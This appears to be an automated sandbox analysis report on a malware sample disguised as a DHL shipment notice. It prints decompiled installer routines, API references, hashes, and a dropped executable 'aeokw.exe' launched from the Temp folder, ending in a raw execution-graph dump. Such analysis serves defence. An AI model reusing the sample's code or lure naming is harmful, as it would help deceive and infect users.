                        • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E00401C43(intOrPtr __edx) {
                        				int _t29;
                        				long _t30;
                        				signed int _t32;
                        				WCHAR* _t35;
                        				long _t36;
                        				int _t41;
                        				signed int _t42;
                        				int _t46;
                        				int _t56;
                        				intOrPtr _t57;
                        				struct HWND__* _t63;
                        				void* _t64;
                        
                        				_t57 = __edx;
                        				_t29 = E00402D84(3);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 - 0x18) = _t29;
                        				_t30 = E00402D84(4);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 + 8) = _t30;
                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                        				}
                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                        					 *(_t64 + 8) = E00402DA6(0x44);
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                        				_push(1);
                        				if(__eflags != 0) {
                        					_t61 = E00402DA6();
                        					_t32 = E00402DA6();
                        					asm("sbb ecx, ecx");
                        					asm("sbb eax, eax");
                        					_t35 =  ~( *_t31) & _t61;
                        					__eflags = _t35;
                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                        					goto L10;
                        				} else {
                        					_t63 = E00402D84();
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t41 = E00402D84(2);
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t56 =  *(_t64 - 0x1c) >> 2;
                        					if(__eflags == 0) {
                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                        						L10:
                        						 *(_t64 - 0x38) = _t36;
                        					} else {
                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                        						asm("sbb eax, eax");
                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                        					}
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                        					_push( *(_t64 - 0x38));
                        					E004065B5();
                        				}
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
                        				return 0;
                        			}

                        APIs
                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                        • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                        • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                        • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                        				char _v68;
                        				char _v132;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t23;
                        				signed int _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t44;
                        				signed int _t46;
                        				signed int _t50;
                        				signed int _t52;
                        				signed int _t53;
                        				signed int _t55;
                        
                        				_t23 = _a16;
                        				_t53 = _a12;
                        				_t44 = 0xffffffdc;
                        				if(_t23 == 0) {
                        					_push(0x14);
                        					_pop(0);
                        					_t24 = _t53;
                        					if(_t53 < 0x100000) {
                        						_push(0xa);
                        						_pop(0);
                        						_t44 = 0xffffffdd;
                        					}
                        					if(_t53 < 0x400) {
                        						_t44 = 0xffffffde;
                        					}
                        					if(_t53 < 0xffff3333) {
                        						_t52 = 0x14;
                        						asm("cdq");
                        						_t24 = 1 / _t52 + _t53;
                        					}
                        					_t25 = _t24 & 0x00ffffff;
                        					_t55 = _t24 >> 0;
                        					_t46 = 0xa;
                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                        				} else {
                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                        					_t50 = 0;
                        				}
                        				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                        				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
                        				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
                        				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                        				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
                        			}

                        APIs
                        • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                        • wsprintfW.USER32 ref: 00404F21
                        • SetDlgItemTextW.USER32 ref: 00404F34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s
                        • API String ID: 3540041739-3551169577
                        • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                        • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                        • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                        • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00405F3D(WCHAR* _a4) {
                        				WCHAR* _t9;
                        
                        				_t9 = _a4;
                        				_push( &(_t9[lstrlenW(_t9)]));
                        				_push(_t9);
                        				if( *(CharPrevW()) != 0x5c) {
                        					lstrcatW(_t9, 0x40a014);
                        				}
                        				return _t9;
                        			}

                        APIs
                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3081826266
                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                        				int _t15;
                        				long _t16;
                        
                        				_t15 = _a8;
                        				if(_t15 != 0x102) {
                        					if(_t15 != 0x200) {
                        						_t16 = _a16;
                        						L7:
                        						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
                        							_push(_t16);
                        							_push(6);
                        							 *0x7a1f74 = _t16;
                        							E00405005();
                        						}
                        						L11:
                        						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
                        					}
                        					if(IsWindowVisible(_a4) == 0) {
                        						L10:
                        						_t16 = _a16;
                        						goto L11;
                        					}
                        					_t16 = E00404F85(_a4, 1);
                        					_t15 = 0x419;
                        					goto L7;
                        				}
                        				if(_a12 != 0x20) {
                        					goto L10;
                        				}
                        				E00404616(0x413);
                        				return 0;
                        			}

                        APIs
                        • IsWindowVisible.USER32(?), ref: 00405673
                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                          • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                        • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                        • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                        • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                        				int _v8;
                        				long _t21;
                        				long _t24;
                        				char* _t30;
                        
                        				asm("sbb eax, eax");
                        				_v8 = 0x800;
                        				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                        				_t30 = _a16;
                        				if(_t21 != 0) {
                        					L4:
                        					 *_t30 =  *_t30 & 0x00000000;
                        				} else {
                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                        					_t21 = RegCloseKey(_a20);
                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                        						goto L4;
                        					}
                        				}
                        				return _t21;
                        			}

                        APIs
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,?,004067A3,80000002), ref: 00406582
                        • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68), ref: 0040658D
                        Strings
                        • C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok, xrefs: 00406543
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                        • API String ID: 3356406503-1777001369
                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00405F89(WCHAR* _a4) {
                        				WCHAR* _t5;
                        				WCHAR* _t7;
                        
                        				_t7 = _a4;
                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                        				while( *_t5 != 0x5c) {
                        					_push(_t5);
                        					_push(_t7);
                        					_t5 = CharPrevW();
                        					if(_t5 > _t7) {
                        						continue;
                        					}
                        					break;
                        				}
                        				 *_t5 =  *_t5 & 0x00000000;
                        				return  &(_t5[1]);
                        			}

                        APIs
                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00405F8F
                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00405F9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-224404859
                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction ID: 7456b8531bb3b8a4d8e8c00392aaf18f99b4ab5ae19bc30171d9ddc8328a16ac
                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction Fuzzy Hash: B1D05EB2411D219ED3126704DD0099F77A8EF5230174A4426E841E71A0D77C5C918AAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
                        				int _v8;
                        				int _t12;
                        				int _t14;
                        				int _t15;
                        				CHAR* _t17;
                        				CHAR* _t27;
                        
                        				_t12 = lstrlenA(_a8);
                        				_t27 = _a4;
                        				_v8 = _t12;
                        				while(lstrlenA(_t27) >= _v8) {
                        					_t14 = _v8;
                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                        					_t15 = lstrcmpiA(_t27, _a8);
                        					_t27[_v8] =  *(_t14 + _t27);
                        					if(_t15 == 0) {
                        						_t17 = _t27;
                        					} else {
                        						_t27 = CharNextA(_t27);
                        						continue;
                        					}
                        					L5:
                        					return _t17;
                        				}
                        				_t17 = 0;
                        				goto L5;
                        			}










                        APIs
                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                        • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:7.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.4%
                        Total number of Nodes:1643
                        Total number of Limit Nodes:100
6769->6772 6881 d77d99 6769->6881 6771 d76086 6770->6771 6773 d71cc3 __cftoe2_l 58 API calls 6771->6773 6772->6769 6773->6758 6775 d75ae6 6774->6775 6776 d75b0a 6774->6776 7031 d7702e LeaveCriticalSection 6775->7031 6776->6699 6779 d78a37 6778->6779 6780 d78a22 6778->6780 6779->6706 6781 d71cc3 __cftoe2_l 58 API calls 6780->6781 6782 d78a27 6781->6782 6783 d71e89 __cftoe2_l 9 API calls 6782->6783 6784 d78a32 6783->6784 6784->6706 6786 d76d22 __wsopen_helper 6785->6786 6787 d744b7 __mtinitlocknum 58 API calls 6786->6787 6788 d76d33 6787->6788 6789 d7442f __lock 58 API calls 6788->6789 6790 d76d38 __wsopen_helper 6788->6790 6794 d76d46 6789->6794 6790->6725 6792 d76e26 6793 d74869 __calloc_crt 58 API calls 6792->6793 6797 d76e2f 6793->6797 6794->6792 6795 d76dc6 EnterCriticalSection 6794->6795 6796 d7442f __lock 58 API calls 6794->6796 6801 d76e94 6794->6801 6802 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6794->6802 6918 d76dee 6794->6918 6795->6794 6798 d76dd6 LeaveCriticalSection 6795->6798 6796->6794 6797->6801 6921 d76c88 6797->6921 6798->6794 6930 d76eb6 6801->6930 6802->6794 6804 d759c6 ___crtIsPackagedApp 6803->6804 6805 d75a21 CreateFileW 6804->6805 6806 d759ca GetModuleHandleW GetProcAddress 6804->6806 6807 d75a3f 6805->6807 6808 d759e7 6806->6808 6807->6731 6807->6733 6807->6742 6808->6807 6810 d736f3 __getptd_noexit 58 API calls 6809->6810 6811 d71c94 6810->6811 6811->6712 6813 d71c8f __write 58 API calls 6812->6813 6814 d71cab _free 6813->6814 6815 d71cc3 __cftoe2_l 58 API calls 6814->6815 6816 d71cbe 6815->6816 6816->6743 6818 d77014 6817->6818 6819 d76fb8 6817->6819 6820 d71cc3 __cftoe2_l 58 API calls 6818->6820 6819->6818 6821 d76fda 6819->6821 6822 d77019 6820->6822 6823 d75e47 6821->6823 6825 d76fff SetStdHandle 6821->6825 6824 d71c8f __write 58 API calls 6822->6824 6823->6750 6823->6769 6826 d77054 6823->6826 6824->6823 6825->6823 6938 d76f45 6826->6938 6828 d77064 6829 d7707d SetFilePointerEx 6828->6829 6830 d7706c 6828->6830 6831 
d77095 GetLastError 6829->6831 6834 d75eb1 6829->6834 6832 d71cc3 __cftoe2_l 58 API calls 6830->6832 6833 d71ca2 __dosmaperr 58 API calls 6831->6833 6832->6834 6833->6834 6834->6756 6834->6769 6836 d76f45 __lseeki64_nolock 58 API calls 6835->6836 6839 d7898c 6836->6839 6837 d789e2 6838 d76ebf __free_osfhnd 59 API calls 6837->6838 6843 d789ea 6838->6843 6839->6837 6840 d789c0 6839->6840 6841 d76f45 __lseeki64_nolock 58 API calls 6839->6841 6840->6837 6842 d76f45 __lseeki64_nolock 58 API calls 6840->6842 6844 d789b7 6841->6844 6845 d789cc CloseHandle 6842->6845 6846 d78a0c 6843->6846 6849 d71ca2 __dosmaperr 58 API calls 6843->6849 6847 d76f45 __lseeki64_nolock 58 API calls 6844->6847 6845->6837 6848 d789d8 GetLastError 6845->6848 6846->6764 6847->6840 6848->6837 6849->6846 6851 d77054 __lseeki64_nolock 60 API calls 6850->6851 6852 d7870a 6851->6852 6853 d7876f 6852->6853 6854 d77054 __lseeki64_nolock 60 API calls 6852->6854 6855 d71cc3 __cftoe2_l 58 API calls 6853->6855 6856 d7877a 6853->6856 6858 d78726 6854->6858 6855->6856 6856->6764 6857 d7880e 6863 d77054 __lseeki64_nolock 60 API calls 6857->6863 6877 d78874 6857->6877 6858->6853 6858->6857 6859 d7874f GetProcessHeap HeapAlloc 6858->6859 6860 d7876a 6859->6860 6866 d78783 __setmode_nolock 6859->6866 6862 d71cc3 __cftoe2_l 58 API calls 6860->6862 6861 d77054 __lseeki64_nolock 60 API calls 6861->6853 6862->6853 6864 d78826 6863->6864 6864->6853 6865 d76f45 __lseeki64_nolock 58 API calls 6864->6865 6867 d7883a SetEndOfFile 6865->6867 6872 d787d4 6866->6872 6880 d787e3 __setmode_nolock 6866->6880 6951 d77e88 6866->6951 6868 d7885a 6867->6868 6867->6877 6870 d71cc3 __cftoe2_l 58 API calls 6868->6870 6871 d7885f 6870->6871 6874 d71c8f __write 58 API calls 6871->6874 6873 d71c8f __write 58 API calls 6872->6873 6876 d787d9 6873->6876 6875 d7886a GetLastError 6874->6875 6875->6877 6879 d71cc3 __cftoe2_l 58 API calls 6876->6879 6876->6880 6877->6853 6877->6861 6878 d787f8 GetProcessHeap HeapFree 6878->6877 6879->6880 
6880->6878 6882 d77da5 __wsopen_helper 6881->6882 6883 d77db2 6882->6883 6884 d77dc9 6882->6884 6885 d71c8f __write 58 API calls 6883->6885 6886 d77e68 6884->6886 6889 d77ddd 6884->6889 6888 d77db7 6885->6888 6887 d71c8f __write 58 API calls 6886->6887 6892 d77e00 6887->6892 6893 d71cc3 __cftoe2_l 58 API calls 6888->6893 6890 d77e05 6889->6890 6891 d77dfb 6889->6891 6895 d76c88 ___lock_fhandle 59 API calls 6890->6895 6894 d71c8f __write 58 API calls 6891->6894 6898 d71cc3 __cftoe2_l 58 API calls 6892->6898 6896 d77dbe __wsopen_helper 6893->6896 6894->6892 6897 d77e0b 6895->6897 6896->6769 6899 d77e31 6897->6899 6900 d77e1e 6897->6900 6901 d77e74 6898->6901 6904 d71cc3 __cftoe2_l 58 API calls 6899->6904 6902 d77e88 __write_nolock 76 API calls 6900->6902 6903 d71e89 __cftoe2_l 9 API calls 6901->6903 6906 d77e2a 6902->6906 6903->6896 6905 d77e36 6904->6905 6907 d71c8f __write 58 API calls 6905->6907 7027 d77e60 6906->7027 6907->6906 6910 d76f2b 6909->6910 6911 d76ecb 6909->6911 6912 d71cc3 __cftoe2_l 58 API calls 6910->6912 6911->6910 6917 d76ef4 6911->6917 6913 d76f30 6912->6913 6914 d71c8f __write 58 API calls 6913->6914 6915 d76f1c 6914->6915 6915->6758 6916 d76f16 SetStdHandle 6916->6915 6917->6915 6917->6916 6933 d74599 LeaveCriticalSection 6918->6933 6920 d76df5 6920->6794 6922 d76c94 __wsopen_helper 6921->6922 6923 d76ce3 EnterCriticalSection 6922->6923 6924 d7442f __lock 58 API calls 6922->6924 6925 d76d09 __wsopen_helper 6923->6925 6926 d76cb9 6924->6926 6925->6801 6927 d76cd1 6926->6927 6928 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6926->6928 6934 d76d0d 6927->6934 6928->6927 6937 d74599 LeaveCriticalSection 6930->6937 6932 d76ebd 6932->6790 6933->6920 6935 d74599 _doexit LeaveCriticalSection 6934->6935 6936 d76d14 6935->6936 6936->6923 6937->6932 6939 d76f50 6938->6939 6940 d76f65 6938->6940 6941 d71c8f __write 58 API calls 6939->6941 6942 d71c8f __write 58 API calls 6940->6942 6944 d76f8a 6940->6944 6943 d76f55 6941->6943 6945 d76f94 
6942->6945 6946 d71cc3 __cftoe2_l 58 API calls 6943->6946 6944->6828 6948 d71cc3 __cftoe2_l 58 API calls 6945->6948 6947 d76f5d 6946->6947 6947->6828 6949 d76f9c 6948->6949 6950 d71e89 __cftoe2_l 9 API calls 6949->6950 6950->6947 6952 d77e95 __write_nolock 6951->6952 6953 d77ed4 6952->6953 6954 d77ef3 6952->6954 6985 d77ec9 6952->6985 6956 d71c8f __write 58 API calls 6953->6956 6959 d77f4b 6954->6959 6960 d77f2f 6954->6960 6955 d75770 __cftoe2_l 6 API calls 6957 d786e9 6955->6957 6958 d77ed9 6956->6958 6957->6866 6961 d71cc3 __cftoe2_l 58 API calls 6958->6961 6962 d77f64 6959->6962 6966 d77054 __lseeki64_nolock 60 API calls 6959->6966 6963 d71c8f __write 58 API calls 6960->6963 6965 d77ee0 6961->6965 7010 d76c34 6962->7010 6964 d77f34 6963->6964 6968 d71cc3 __cftoe2_l 58 API calls 6964->6968 6969 d71e89 __cftoe2_l 9 API calls 6965->6969 6966->6962 6971 d77f3b 6968->6971 6969->6985 6970 d77f72 6972 d782cb 6970->6972 7019 d736db 6970->7019 6975 d71e89 __cftoe2_l 9 API calls 6971->6975 6973 d7865e WriteFile 6972->6973 6974 d782e9 6972->6974 6976 d782be GetLastError 6973->6976 6987 d7828b 6973->6987 6977 d7840d 6974->6977 6984 d782ff 6974->6984 6975->6985 6976->6987 6988 d78418 6977->6988 7002 d78502 6977->7002 6980 d78697 6980->6985 6986 d71cc3 __cftoe2_l 58 API calls 6980->6986 6981 d77fdd 6981->6972 6982 d77fed GetConsoleCP 6981->6982 6982->6980 7005 d7801c 6982->7005 6983 d7836e WriteFile 6983->6976 6983->6984 6984->6980 6984->6983 6984->6987 6985->6955 6989 d786c5 6986->6989 6987->6980 6987->6985 6990 d783eb 6987->6990 6988->6980 6988->6987 6992 d7847d WriteFile 6988->6992 6993 d71c8f __write 58 API calls 6989->6993 6994 d783f6 6990->6994 6995 d7868e 6990->6995 6991 d78577 WideCharToMultiByte 6991->6976 6991->7002 6992->6976 6992->6988 6993->6985 6996 d71cc3 __cftoe2_l 58 API calls 6994->6996 6997 d71ca2 __dosmaperr 58 API calls 6995->6997 6998 d783fb 6996->6998 6997->6985 7000 d71c8f __write 58 API calls 6998->7000 6999 d785c6 WriteFile 6999->7002 7003 d78619 
GetLastError 6999->7003 7000->6985 7002->6980 7002->6987 7002->6991 7002->6999 7003->7002 7004 d792d3 WriteConsoleW CreateFileW __putwch_nolock 7004->7005 7005->6976 7005->6987 7005->7004 7006 d78105 WideCharToMultiByte 7005->7006 7007 d792bb 60 API calls __write_nolock 7005->7007 7009 d7819a WriteFile 7005->7009 7024 d791b5 7005->7024 7006->6987 7008 d78140 WriteFile 7006->7008 7007->7005 7008->6976 7008->7005 7009->6976 7009->7005 7011 d76c3f 7010->7011 7012 d76c4c 7010->7012 7013 d71cc3 __cftoe2_l 58 API calls 7011->7013 7015 d76c58 7012->7015 7016 d71cc3 __cftoe2_l 58 API calls 7012->7016 7014 d76c44 7013->7014 7014->6970 7015->6970 7017 d76c79 7016->7017 7018 d71e89 __cftoe2_l 9 API calls 7017->7018 7018->7014 7020 d736f3 __getptd_noexit 58 API calls 7019->7020 7021 d736e1 7020->7021 7022 d736ee GetConsoleMode 7021->7022 7023 d717be __lock 58 API calls 7021->7023 7022->6972 7022->6981 7023->7022 7025 d7917b __isleadbyte_l 58 API calls 7024->7025 7026 d791c2 7025->7026 7026->7005 7030 d7702e LeaveCriticalSection 7027->7030 7029 d77e66 7029->6896 7030->7029 7031->6776 7033 d7637d 7032->7033 7040 d76394 7032->7040 7034 d76384 7033->7034 